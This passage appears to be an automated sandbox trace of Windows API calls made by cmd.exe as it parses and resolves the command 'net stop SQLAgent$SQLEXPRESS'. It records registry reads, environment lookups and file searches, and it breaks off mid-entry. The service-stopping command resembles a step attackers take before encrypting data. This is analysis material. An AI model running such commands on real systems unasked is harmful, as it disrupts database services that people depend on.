[0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x40, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x40, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x40, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegCloseKey (hKey=0x68) returned 0x0 [0068.641] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x42e9b0 | out: phkResult=0x42e9b0*=0x68) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x40, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x1, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x1, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x0, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x9, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x4, lpData=0x42e9bc*=0x9, lpcbData=0x42e9b4*=0x4) returned 0x0 [0068.641] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x42e9b8, lpData=0x42e9bc, lpcbData=0x42e9b4*=0x1000 | out: lpType=0x42e9b8*=0x0, lpData=0x42e9bc*=0x9, lpcbData=0x42e9b4*=0x1000) returned 0x2 [0068.641] RegCloseKey (hKey=0x68) returned 0x0 [0068.641] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0068.642] srand (_Seed=0x5d97ebb3) [0068.642] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLAgent$SQLEXPRESS" [0068.642] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop SQLAgent$SQLEXPRESS" [0068.642] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.642] GetProcessHeap () returned 0x730000 [0068.642] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x210) returned 0x742048 [0068.642] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x742050, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.642] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.642] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.642] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.642] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.642] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.642] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.642] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.642] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.642] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.642] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.642] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.642] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.642] GetProcessHeap () returned 0x730000 [0068.642] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x742b20 | out: hHeap=0x730000) returned 1 [0068.643] GetEnvironmentStringsW () returned 0x742260* [0068.643] GetProcessHeap () returned 0x730000 [0068.643] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xae2) returned 0x744bc0 [0068.643] FreeEnvironmentStringsW (penv=0x742260) returned 1 [0068.643] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.643] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.643] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.643] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.643] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.643] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.643] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.643] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.643] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.643] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.643] GetProcessHeap () returned 0x730000 [0068.643] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x54) returned 0x7456b0 [0068.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x42f77c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x42f77c, lpFilePart=0x42f778 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x42f778*="Desktop") returned 0x25 [0068.643] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.643] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x42f4f8 | out: lpFindFileData=0x42f4f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x741ec8 [0068.643] FindClose (in: hFindFile=0x741ec8 | out: hFindFile=0x741ec8) returned 1 [0068.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x42f4f8 | out: lpFindFileData=0x42f4f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x741ec8 [0068.644] FindClose (in: hFindFile=0x741ec8 | out: hFindFile=0x741ec8) returned 1 [0068.644] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x42f4f8 | out: lpFindFileData=0x42f4f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x741ec8 [0068.644] FindClose (in: hFindFile=0x741ec8 | out: hFindFile=0x741ec8) returned 1 [0068.644] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.644] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.644] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.644] GetProcessHeap () returned 0x730000 [0068.644] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x744bc0 | out: hHeap=0x730000) returned 1 [0068.644] GetEnvironmentStringsW () returned 0x7440d0* [0068.644] GetProcessHeap () returned 0x730000 [0068.644] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xb36) returned 0x745f10 [0068.644] FreeEnvironmentStringsW (penv=0x7440d0) returned 1 [0068.644] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.644] GetProcessHeap () returned 0x730000 [0068.644] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7456b0 | out: hHeap=0x730000) returned 1 [0068.645] GetProcessHeap () returned 0x730000 [0068.645] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x400e) returned 0x746a50 [0068.645] GetProcessHeap () returned 0x730000 [0068.645] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x46) returned 0x741ec8 [0068.645] GetProcessHeap () returned 0x730000 [0068.645] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x746a50 | out: hHeap=0x730000) returned 1 [0068.645] GetConsoleOutputCP () returned 0x1b5 [0069.335] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.335] GetUserDefaultLCID () returned 0x409 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x42f8bc, cchData=128 | out: lpLCData="0") returned 2 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x42f8bc, cchData=128 | out: lpLCData="0") returned 2 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x42f8bc, cchData=128 | out: lpLCData="1") returned 2 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.336] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.337] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.337] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.339] GetProcessHeap () returned 0x730000 [0069.339] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x20c) returned 0x742dd8 [0069.339] GetConsoleTitleW (in: lpConsoleTitle=0x742dd8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.339] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.339] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.339] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.339] GetProcessHeap () returned 0x730000 [0069.339] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x400a) returned 0x746a50 [0069.339] GetProcessHeap () returned 0x730000 [0069.339] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x746a50 | out: hHeap=0x730000) returned 1 [0069.340] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.340] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.340] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.340] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.340] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.340] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.340] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.340] GetProcessHeap () returned 0x730000 [0069.340] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x58) returned 0x742ff0 [0069.340] GetProcessHeap () returned 0x730000 [0069.340] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x10) returned 0x73ff20 [0069.340] GetProcessHeap () returned 0x730000 [0069.340] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3c) returned 0x743050 [0069.341] GetConsoleTitleW (in: lpConsoleTitle=0x42f5b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.341] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.341] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.341] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.341] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.342] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.342] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.342] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.342] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.342] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.342] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.342] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.342] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.342] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.342] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.342] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.342] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.342] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.342] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.342] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.342] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.342] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.342] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.342] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.342] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.342] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.342] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.342] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.342] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.342] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.342] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.342] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.342] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.342] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.342] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.342] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.342] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.342] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.342] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.342] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.342] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.343] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.343] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.343] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.343] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.343] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.343] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.343] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.343] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.343] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.343] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.343] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.343] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.343] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.343] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.343] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.343] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.343] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.343] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.343] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.343] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.343] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.343] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.343] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.343] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.343] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.343] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.343] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.343] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.343] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.343] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.343] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.344] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.344] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.344] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.344] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.344] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.344] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.344] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.344] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.344] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.344] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.344] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.344] GetProcessHeap () returned 0x730000 [0069.344] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x210) returned 0x743098 [0069.344] GetProcessHeap () returned 0x730000 [0069.344] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x44) returned 0x7432b0 [0069.344] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.344] GetProcessHeap () returned 0x730000 [0069.344] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x418) returned 0x7307f0 [0069.344] SetErrorMode (uMode=0x0) returned 0x0 [0069.344] SetErrorMode (uMode=0x1) returned 0x0 [0069.344] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7307f8, lpFilePart=0x42f0d4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x42f0d4*="Desktop") returned 0x25 [0069.344] SetErrorMode (uMode=0x0) returned 0x1 [0069.344] GetProcessHeap () returned 0x730000 [0069.345] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7307f0, Size=0x5c) returned 0x7307f0 [0069.345] GetProcessHeap () returned 0x730000 [0069.345] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x7307f0) returned 0x5c [0069.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.345] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.345] GetProcessHeap () returned 0x730000 [0069.345] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x120) returned 0x743300 [0069.345] GetProcessHeap () returned 0x730000 [0069.345] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x238) returned 0x730858 [0069.351] GetProcessHeap () returned 0x730000 [0069.351] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x730858, Size=0x122) returned 0x730858 [0069.351] GetProcessHeap () returned 0x730000 [0069.351] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x730858) returned 0x122 [0069.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.351] GetProcessHeap () returned 0x730000 [0069.351] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xe0) returned 0x743428 [0069.352] GetProcessHeap () returned 0x730000 [0069.352] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x743428, Size=0x76) returned 0x743428 [0069.352] GetProcessHeap () returned 0x730000 [0069.352] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x743428) returned 0x76 [0069.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x42ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x42ee50) returned 0xffffffff [0069.353] GetLastError () returned 0x2 [0069.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x42ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x42ee50) returned 0xffffffff [0069.353] GetLastError () returned 0x2 [0069.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x42ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x42ee50) returned 0x7434a8 [0069.353] GetProcessHeap () returned 0x730000 [0069.353] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x14) returned 0x7434e8 [0069.353] FindClose (in: hFindFile=0x7434a8 | out: hFindFile=0x7434a8) returned 1 [0069.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x42ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x42ee50) returned 0xffffffff [0069.353] GetLastError () returned 0x2 [0069.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x42ee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x42ee50) returned 0x7434a8 [0069.353] GetProcessHeap () returned 0x730000 [0069.354] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7434e8, Size=0x4) returned 0x7434e8 [0069.354] FindClose (in: hFindFile=0x7434a8 | out: hFindFile=0x7434a8) returned 1 [0069.354] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.354] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.354] GetConsoleTitleW (in: lpConsoleTitle=0x42f348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.354] InitializeProcThreadAttributeList (in: lpAttributeList=0x42f1d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x42f298 | out: lpAttributeList=0x42f1d0, lpSize=0x42f298) returned 1 [0069.354] UpdateProcThreadAttribute (in: lpAttributeList=0x42f1d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x42f290, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x42f1d0, lpPreviousValue=0x0) returned 1 [0069.354] GetStartupInfoW (in: lpStartupInfo=0x42f18c | out: lpStartupInfo=0x42f18c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.354] GetProcessHeap () returned 0x730000 [0069.354] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x18) returned 0x7434a8 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", 